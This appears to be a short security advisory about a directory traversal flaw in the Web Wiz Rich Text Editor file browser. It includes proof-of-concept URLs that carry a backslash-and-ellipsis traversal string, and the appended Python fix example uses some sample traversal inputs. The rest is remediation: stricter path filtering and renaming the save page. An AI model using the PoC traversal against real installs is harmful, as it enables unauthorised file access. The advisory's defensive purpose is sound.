########################## WwW.BugReport.ir ###########################################
###################################################################################
####################
-POC:
http://[WebWiz RTE]/RTE_file_browser.asp?look=save&sub=\…\\\…\\\…\\\…\\\…\\\
http://[WebWiz RTE]/RTE_popup_save_file.asp
####################
Fast Solution :
####################
1- You can see the following lines in "RTE_file_browser.asp":
'Stip path tampering for security reasons
strSubFolderName = Replace(strSubFolderName, "../", "", 1, -1, 1)
strSubFolderName = Replace(strSubFolderName, "..\", "", 1, -1, 1)
strSubFolderName = Replace(strSubFolderName, "./", "", 1, -1, 1)
strSubFolderName = Replace(strSubFolderName, ".\", "", 1, -1, 1)
Add only these lines after them:
strSubFolderName = Replace(strSubFolderName, "/", "\", 1, -1, 1)
strSubFolderName = Replace(strSubFolderName, "\\", "\", 1, -1, 1)
strSubFolderName = Replace(strSubFolderName, "…", "", 1, -1, 1)
2- Rename "RTE_popup_save_file.asp" until the vendor releases a proper fix
####################
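Added example (not part of the original advisory and not Web Wiz RTE code): a Python model of the four Replace() calls quoted above, next to a stricter check that rejects anything other than plain folder names and then confirms the resolved path is still under the upload root. UPLOAD_ROOT, legacy_filter and resolve_subfolder are hypothetical names, and the sample values are constructed.

```python
import ntpath  # Windows path rules; importable on any OS
import re

UPLOAD_ROOT = r"C:\inetpub\wwwroot\uploads"  # hypothetical upload root

# One folder name: begins and ends with a letter, digit or underscore.
# This excludes ".", "..", dot-only names, trailing dots/spaces and ":".
SAFE_PART = re.compile(r"[A-Za-z0-9_](?:[A-Za-z0-9_ .-]*[A-Za-z0-9_])?")


def legacy_filter(sub):
    """Model of the four Replace() calls quoted from RTE_file_browser.asp."""
    for pattern in ("../", "..\\", "./", ".\\"):
        sub = sub.replace(pattern, "")  # single pass, like VBScript Replace
    return sub


def resolve_subfolder(sub, root=UPLOAD_ROOT):
    """Return the canonical folder for `sub`, or None if it is not acceptable."""
    root_n = ntpath.normpath(root)
    parts = [p for p in re.split(r"[\\/]+", sub or "") if p]
    if any(not SAFE_PART.fullmatch(p) for p in parts):
        return None  # reject; never try to repair the input
    candidate = ntpath.normpath(ntpath.join(root_n, *parts))
    # Second line of defence: the result must still sit under the root.
    r, c = ntpath.normcase(root_n), ntpath.normcase(candidate)
    if c != r and not c.startswith(r + "\\"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample values for the "sub" parameter.
    for sample in ("images\\2008", "images/logos", "..\\..\\secret",
                   "images\\..\\..\\secret", "C:\\Windows", "docs. "):
        print(repr(sample), "| legacy ->", repr(legacy_filter(sample)),
              "| strict ->", resolve_subfolder(sample))
```

The legacy filter silently rewrites a request into a different folder name, while the strict check refuses it, so a rejected request can be logged and investigated.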